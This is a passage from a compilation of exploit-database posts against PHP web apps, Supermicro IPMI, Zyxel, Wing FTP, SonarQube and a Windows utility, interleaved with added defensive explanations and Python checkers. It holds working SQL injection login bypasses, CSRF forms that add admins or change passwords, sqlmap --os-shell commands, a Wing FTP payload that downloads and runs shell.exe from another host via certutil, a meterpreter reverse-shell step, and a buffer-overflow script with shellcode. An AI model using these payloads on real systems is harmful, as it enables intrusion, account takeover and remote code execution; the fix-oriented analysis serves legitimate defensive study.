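    ROOT = "C:\\inetpub\\wwwroot\\uploads"
    print(resolve_download_path(ROOT, "/", "report.pdf"))
    for fp, fn in (("..\\..", "web.config"),
                   ("/", "C:\\Windows\\debug\\NetSetup.log"),
                   ("/", "..\\web.config")):
        print(fp, fn, "->", is_download_allowed(ROOT, fp, fn))
```

The prefix comparison is only meaningful after normalization on both sides; comparing the raw concatenated string against the root (a common first attempt) passes `..` straight through. Note also that the check says nothing about which files under the root are appropriate to serve, which is why the root must be a dedicated download folder rather than `Server.MapPath("/")`.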
-
Park Ticketing Management System 1.0 - Authentication Bypass
# Exploit Title: Park Ticketing Management System 1.0 - Authentication Bypass
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

Vulnerable File:
----------------
/index.php

Vulnerable Code:
----------------
line 8: $adminuser=$_POST['username'];

Vulnerable Issue:
-----------------
$adminuser=$_POST['username']; has no sanitization

POC User Login:
---------------
URL: http://localhost/ptms/index.php
Username : ' or '1'='1'#
Password : anything

Python POC:
-----------

import requests, re

url = "http://localhost:80/ptms/index.php"
payload = "username=%27+or+%271%27%3D%271%27%23&password=anything&login="
headers = {
    "Origin": "http://localhost",
    "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Connection": "close",
    "Referer": "http://localhost/ptms/index.php",
    "Host": "localhost",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Length": "80",
    "Content-Type": "application/x-www-form-urlencoded"
}
pattern = "PTMS ADMIN"

response = requests.request("POST", url, data=payload, headers=headers)
if re.findall(pattern, response.text):
    print("[+] Authentication bypassed using the following payload : " + payload)
else:
    print("[!] Something wrong somewhere")
-
SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Date: 2020-07-15
# Vendor Homepage: https://www.supermicro.com/
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.
# PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
      <input type="hidden" name="username" value="JOKER" />
      <input type="hidden" name="original_username" value="2" />
      <input type="hidden" name="password" value="onebadday" />
      <input type="hidden" name="new_privilege" value="4" />
      <input type="submit" value="submit request" />
    </form>
  </body>
</html>
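The form above works because config_user.cgi accepts any POST that arrives with the logged-in admin's session cookie, whatever page the form was served from; `history.pushState` only tidies the address bar and changes nothing the BMC can see. The block below is an added example, not Supermicro firmware code, of the two server-side checks that refuse such a request: a per-session synchronizer token compared in constant time, and an Origin (falling back to Referer) check against the BMC's own host. The request is modelled as plain dicts; the host name, the form field `csrf_token` and the function names are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit


def issue_csrf_token(session):
    """Store a fresh random token in the server-side session and return it.

    The token is embedded as a hidden field in the real user-management form;
    a page on attacker.example cannot read it, so it cannot reproduce it.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def request_is_same_origin(headers, own_host):
    """Accept only if Origin (or, failing that, Referer) names this host.

    Current browsers send Origin on form POSTs; a request carrying neither
    header is refused rather than trusted.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    source = lowered.get("origin") or lowered.get("referer")
    if not source:
        return False
    return urlsplit(source).netloc.lower() == own_host.lower()


def csrf_check(session, headers, form, own_host):
    """Return True only if a state-changing POST may proceed."""
    if not request_is_same_origin(headers, own_host):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not supplied:
        return False
    # compare_digest keeps the comparison time independent of where the
    # first mismatching byte is, so the token cannot be recovered byte-wise.
    return hmac.compare_digest(expected, supplied)


if __name__ == "__main__":
    # Constructed requests: the PoC form above, then a legitimate submission
    session = {}
    token = issue_csrf_token(session)
    poc_form = {"username": "JOKER", "original_username": "2",
                "password": "onebadday", "new_privilege": "4"}
    print("forged:", csrf_check(session, {"Origin": "https://attacker.example"}, poc_form, "bmc.example"))
    legit = dict(poc_form, csrf_token=token)
    print("legit: ", csrf_check(session, {"Origin": "https://bmc.example"}, legit, "bmc.example"))
```

Either check alone stops the PoC as written; keeping both matters because Origin/Referer can be stripped by privacy extensions or proxies (which the code treats as a refusal, not a pass), while the token check survives that and also covers requests sent from scripts rather than forms.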
-
Zyxel Armor X1 WAP6806 - Directory Traversal
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Date: 2020-06-19
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software: http://www.zyxelguard.com/WAP6806.asp
# Version: V1.00(ABAL.6)C0
# CVE: CVE-2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]

# As a result of the research, one vulnerability was identified
# (Directory Traversal). Technical information is provided below step by step.

# [1] - Directory Traversal Vulnerability
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/
# Proof of Concept: https://TARGET/Zyxel/images/eaZy/
-
Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
# Date: 2020-07-03
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
# Software Link: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
# Version: 0.1.0
# Tested on: Kali Linux

Source code (localhost/admin/loginauth.php):

<?php
session_start();
$_SESSION['username'] = $_POST['username'];
$_SESSION['password'] = $_POST['password'];
include './auth.php';
$re = mysql_query("select * from user where username = '".$_SESSION['username']."' AND password = '".$_SESSION['password']."' " );
echo mysql_error();
if(mysql_num_rows($re) > 0) {
    header('Refresh: 0;url=dashboard.php');
} else {
    session_destroy();
    header("location: index.htm");
}
?>

Payload:
Username: 1' or 1 = 1 LIMIT 1#
Password: 1' or 1 = 1 LIMIT 1#
-
Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
# Version: 0.1.0
# Tested on: Kali Linux

Source code (review.php):

<?php if($result) : while($row1 = $result->fetch_array()) : ?>
<div class="con">
  <div class="row">
    <div class="col-sm-4">
      <em style="color: black;"><?= $row1['comment']; ?></em>
    </div>

POC:
1. Go to http://192.168.1.58/a/review.php?pid=31
2. We send the payload (<script>alert(1)</script>)
3. Write a review payload and submit
4. And refresh the page
-
Online Polling System 1.0 - Authentication Bypass
# Exploit Title: Online Polling System 1.0 - Authentication Bypass
# Date: 2020-07-20
# Author: AppleBois
# Version: NULL
# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
#
# Administration Control Panel || Authentication Bypass
# An unauthenticated user can perform SQL injection to bypass the login mechanism in /admin/checklogin.php
#
######################################################################################
# Vulnerable Code
#
# $myusername=$_POST['myusername'];
# $mypassword=$_POST['mypassword'];
# $encrypted_mypassword=md5($mypassword);
#
# $result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
#
# $count=mysqli_num_rows($result);
#
# if($count==1){
#
# $user = mysqli_fetch_assoc($result);
# $_SESSION['member_id'] = $user['member_id'];
# header("location:student.php");
# }
#
######################################################################################

POST /admin/checklogin.php HTTP/1.1
Host: 10.10.10.2:81
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.2:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.2:81/online/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
Connection: close

myusername=' or 1=1#&mypassword=ad&Submit=Login
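The four login bypasses on this page (Barangay adminlogin.php, Park Ticketing index.php, the hotel booking loginauth.php and the polling checklogin.php above) are one bug: the username is spliced into the SQL text, so a quote in it ends the literal and the rest of the input becomes part of the WHERE clause. The block below is an added example, not code from any of those projects, that runs the checklogin.php logic and its parameterized replacement against an in-memory SQLite table with two constructed admin rows. It also shows why the hotel payload carries `LIMIT 1`: with more than one row in the table, a bare `OR 1=1` returns several rows and the `$count==1` test fails. SQLite has no MySQL `#` comment, so the payloads here use `-- ` (both engines accept it); the MySQL-only `'=''or'` trick from the Barangay post relies on MySQL's string-to-number coercion and is not reproduced. Table and column names follow the polling-system code; everything else is an assumption.

```python
import hashlib
import sqlite3

# Payloads: "-- " discards the rest of the clause the way "#" does in MySQL.
BYPASS = "' OR 1=1 -- "
BYPASS_ONE_ROW = "' OR 1=1 LIMIT 1 -- "


def make_db():
    """Constructed sample table with two admins whose passwords the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbadministrators (member_id INTEGER, email TEXT, password TEXT)")
    rows = [(1, "admin@example.org", "correct horse battery staple"),
            (2, "staff@example.org", "another secret")]
    for member_id, email, pw in rows:
        conn.execute("INSERT INTO tbadministrators VALUES (?, ?, ?)",
                     (member_id, email, hashlib.md5(pw.encode()).hexdigest()))
    return conn


def build_vulnerable_sql(username, encrypted):
    """The exact string checklogin.php hands to mysqli_query."""
    return ("SELECT member_id FROM tbadministrators "
            "WHERE email='%s' AND password='%s'" % (username, encrypted))


def login_vulnerable(conn, username, password):
    """Mirror of checklogin.php: md5 the password, concatenate, require exactly one row."""
    encrypted = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute(build_vulnerable_sql(username, encrypted)).fetchall()
    return rows[0][0] if len(rows) == 1 else None


def login_fixed(conn, username, password):
    """Same check with bound parameters: the input is compared, never parsed as SQL."""
    encrypted = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute(
        "SELECT member_id FROM tbadministrators WHERE email=? AND password=?",
        (username, encrypted),
    ).fetchall()
    return rows[0][0] if len(rows) == 1 else None


def demo():
    """Run both versions against the constructed table; returns the member_id each grants."""
    conn = make_db()
    return {
        "vuln_or_1_1": login_vulnerable(conn, BYPASS, "anything"),         # 2 rows -> refused
        "vuln_limit_1": login_vulnerable(conn, BYPASS_ONE_ROW, "anything"),  # 1 row -> member 1
        "fixed_limit_1": login_fixed(conn, BYPASS_ONE_ROW, "anything"),      # refused
        "fixed_real": login_fixed(conn, "admin@example.org", "correct horse battery staple"),
    }


if __name__ == "__main__":
    print(build_vulnerable_sql(BYPASS_ONE_ROW, "<md5>"))
    for name, result in demo().items():
        print("%-14s -> %r" % (name, result))
```

The md5 step is kept deliberately: hashing the password does nothing for the username, and the `$count==1` guard is not a defence either, only an accident that the `LIMIT 1` variant steps around. The hotel code's `mysql_num_rows($re) > 0` accepts even the multi-row case.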
-
Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
# Date: 2020-06-17
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://joomsky.com/
# Software Link: https://joomsky.com/products/js-jobs-pro.html
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
# Version: 1.3.0
# Tested on: Kali Linux - Apache2

Vulnerable param: sortby

-------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1

js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
-------------------------------------------------------------------------

sqlmap poc:
sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby

Mehmet KELEPÇE
Penetration Tester | Red Team
-
Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
# Google Dork: inurl:storefrontb2bweb
# Date: 2020-06-27
# Exploit Author: ratboy
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
# Version: Infor Storefront
# Tested on: Windows All Versions

[POC Multiple Vulns]

python sqlmap.py -u "http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass" -p usr_name --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES

python sqlmap.py -u "http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1" -p itm_id --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES

or...

http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL INJECTION];--
http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL INJECTION];--

--
Sincerely,
Aaron Schrom
-
Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
# Date: 2020-06-26
# Exploit Author: v1n1v131r4
# Vendor Homepage: https://www.wftpserver.com/
# Software Link: https://www.wftpserver.com/download.htm
# Version: 6.3.8
# Tested on: Windows 10
# CVE : --

Wing FTP Server has a web console based on the Lua language. For authenticated users, this console can be exploited to obtain a reverse shell.

1) Generate your payload (e.g. msfvenom)
2) Send and execute via POST

POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1
Host: 192.168.56.105:5466
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.105:5466/admin_lua_term.html
Content-Type: text/plain;charset=UTF-8
Content-Length: 153
Connection: close
Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5

command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
-
Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)
# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)
# Exploit Author: PovlTekstTV
# Date: 2020-07-15
# Vulnerable Software: Simple Startup Manager
# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
# Version: 1.17
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
# DEP and ASLR Disabled on system
# Space for shellcode: 264

#!/usr/bin/python

# Two sets of instructions are needed:
# 1. JMP EDI
# 2. JMP EBX
# I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR
# The exploit will probably not work unless changed/bruteforced.
# It is also possible to overwrite the SEH-handler with 600+ bytes,
# however I did not find any POP, POP, RETs.

# Walkthrough:
# 1.- Run the python script, it will create a new file "exploit.txt"
# 2.- Copy the content of the new file 'exploit.txt' to clipboard
# 3.- Turn off DEP for startup-manager.exe
# 4.- Open 'startup-manager.exe'
# 5.- Click 'New' or go to 'File' and click 'New'
# 6.- Paste content from clipboard into 'File' parameter
# 7.- Click on 'OK'
# 8.- Calc.exe runs.

#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c
#msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c"
shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1"
"\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47"
"\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44"
"\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb"
"\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f"
"\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75"
"\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5"
"\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61"
"\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91"
"\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb"
"\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a"
"\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2"
"\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d"
"\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13"
"\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42")

payload = shellcode
payload += ("A"*(268-len(payload)-4))
payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]

#Write payload to file
file = open("exploit.txt" , 'w')
file.write(payload)
file.close()
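The post's script pads the shellcode to 264 bytes and drops two 4-byte gadget addresses at offsets 264 and 268, but never checks the result against the bad-character list it states at the top (note that list includes \x09 while the msfvenom `-b` line omits it, so a regenerated payload could pick it up). The builder below is an added example, not the post author's code: it rebuilds the same layout in Python 3 with the post's offsets and SETUPAPI.dll addresses, refuses to write a payload that is too long or contains a bad byte anywhere (filler and gadget bytes included), decodes the gadget slots back out for a sanity check, and writes the file in binary mode. The shellcode it uses is a constructed placeholder of `int3` breakpoints, not the post's calc.exe shellcode.

```python
import struct

# Layout and bad characters as stated in the post above.
BADCHARS = bytes([0x00, 0x0A, 0x09, 0x0C, 0x0D, 0x3A, 0x5C])
SHELLCODE_SPACE = 264          # bytes from the start of the field to the first gadget slot
JMP_EBX = 0x764EA9E4           # SETUPAPI.dll, slot at offset 264
JMP_EDI = 0x764EBC5F           # SETUPAPI.dll, overwrites the saved return address at 268
EIP_OFFSET = SHELLCODE_SPACE + 4


def find_badchars(blob: bytes, badchars: bytes = BADCHARS) -> list:
    """Return the sorted set of bad bytes that occur in blob (empty if clean)."""
    return sorted({b for b in blob if b in badchars})


def build_payload(shellcode: bytes, jmp_ebx: int = JMP_EBX, jmp_edi: int = JMP_EDI) -> bytes:
    """shellcode | 'A' filler up to 264 | JMP EBX | JMP EDI (return address).

    Raises ValueError instead of silently writing a payload that the
    clipboard paste or the program's string handling would truncate.
    """
    if len(shellcode) > SHELLCODE_SPACE:
        raise ValueError(f"shellcode is {len(shellcode)} bytes, only {SHELLCODE_SPACE} available")
    payload = shellcode + b"A" * (SHELLCODE_SPACE - len(shellcode))
    payload += struct.pack("<I", jmp_ebx)   # little-endian, same bytes as the post's strings
    payload += struct.pack("<I", jmp_edi)
    bad = find_badchars(payload)
    if bad:
        raise ValueError("payload contains bad chars: " + " ".join(f"\\x{b:02x}" for b in bad))
    return payload


def describe_layout(payload: bytes) -> dict:
    """Decode the two gadget slots back out of a built payload for a sanity check."""
    return {
        "length": len(payload),
        "jmp_ebx": struct.unpack("<I", payload[SHELLCODE_SPACE:SHELLCODE_SPACE + 4])[0],
        "jmp_edi": struct.unpack("<I", payload[EIP_OFFSET:EIP_OFFSET + 4])[0],
    }


if __name__ == "__main__":
    # Constructed placeholder: software breakpoints instead of real shellcode,
    # so a debugger attached to startup-manager.exe stops on the first byte.
    demo_shellcode = b"\xcc" * 32
    payload = build_payload(demo_shellcode)
    with open("exploit.txt", "wb") as fh:     # binary mode: no newline translation
        fh.write(payload)
    print(describe_layout(payload))
```

Swap `demo_shellcode` for msfvenom output generated with the full bad-character list; if the gadget addresses have to be re-found on a different SETUPAPI.dll build, the same check covers them too, since every address byte ends up in the pasted string.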
-
CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : CVE-2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC :

<html>
  <body>
    <!-- rewrite the visible URL so the victim sees only "/" -->
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/cmsuno-master/uno.php" method="POST">
      <input type="hidden" name="user" value="admin"/>
      <input type="hidden" name="pass" value="yourpassword"/>
      <!-- the submit button carries no name, so it cannot override the "user" field -->
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>
-
Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path
# Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path
# Author: Velayutham Selvaraj
# Date: 2020-06-03
# Vendor Homepage: https://www.sonarqube.org
# Software Link: https://www.sonarqube.org/downloads/
# Version : 8.3.1
# Tested on: Windows 10 64bit(EN)

About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, it leads to a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level, which most of the time it is).

Steps to recreate :
=============================
1. Open CMD and check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc SonarQube ]
4. The command would return..

C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SonarQube
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SonarQube
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
6. Now create a payload with msfvenom or other tools and name it wrapper.exe
7. Make sure you have write permissions to where you downloaded. I kept it in the Downloads folder but confirmed it in Program Files as well.
8. Provided that you have the right permissions, drop the wrapper.exe executable you created into the "C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\" directory.
9. Now restart the IObit Uninstaller service by giving the command [ sc stop SonarQube ] followed by [ sc start SonarQube ]
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM privilege].

During my testing :
Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different process]
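An unquoted service path is only hijackable where CreateProcess, walking the path space by space, would try a file an attacker can create before it reaches the real image: for `C:\Program Files\Foo 1.0\bin\svc.exe` that means `C:\Program.exe` and `C:\Program Files\Foo.exe`, and the attack needs write access to one of those directories. The checker below is an added example (not the post author's tooling and not SonarQube code): it parses `sc qc` output, applies that prefix rule, and reports whether the service auto-starts as LocalSystem. The `sc qc` text it parses is constructed for a hypothetical install under `C:\Program Files\SonarQube 8.3\`; the second path is the one printed in the post, which contains no spaces before `wrapper.exe` and therefore produces no hijack candidates at all, so for that install the replacement-binary step depends on being able to overwrite `wrapper.exe` itself, not on the unquoted path.

```python
import re

# Constructed 'sc qc' output for a hypothetical install under Program Files.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SonarQube
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\SonarQube 8.3\bin\windows-x86-64\wrapper.exe -s C:\Program Files\SonarQube 8.3\conf\wrapper.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SonarQube
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# BINARY_PATH_NAME exactly as printed in the post's sc qc output.
POST_BINARY_PATH = (r"C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397"
                    r"\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads"
                    r"\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf")


def parse_sc_qc(text: str) -> dict:
    """Turn 'sc qc <name>' output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def hijack_candidates(binary_path_name: str) -> list:
    """Files CreateProcess would try before the intended image for an unquoted
    path: every space-delimited prefix (with .exe appended when the last path
    component has no extension), stopping at the first prefix ending in .exe.
    A quoted path, or one with no space before the .exe, yields no candidates.
    """
    p = binary_path_name.strip()
    if p.startswith('"'):
        return []
    tokens = p.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break                       # reached the real image path
        if "." not in prefix.rsplit("\\", 1)[-1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def assess(sc_qc_text: str) -> dict:
    """Summarise what matters for privilege escalation via this service."""
    f = parse_sc_qc(sc_qc_text)
    return {
        "service": f.get("SERVICE_NAME"),
        "runs_as_system": f.get("SERVICE_START_NAME", "").lower() == "localsystem",
        "auto_start": "AUTO_START" in f.get("START_TYPE", ""),
        "hijack_candidates": hijack_candidates(f.get("BINARY_PATH_NAME", "")),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_SC_QC))
    print(hijack_candidates(POST_BINARY_PATH))   # [] : no space before wrapper.exe
```

Feed it real output with `sc qc SonarQube > sc.txt` and `assess(open("sc.txt").read())`; then check each candidate's parent directory with `icacls` for write or create-file rights held by the low-privileged account, since the candidate list alone says nothing about whether the drop is possible.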
-
NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
# Date: 2019-06-28
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
# Software Link: https://sourceforge.net/projects/netpclinker/files/
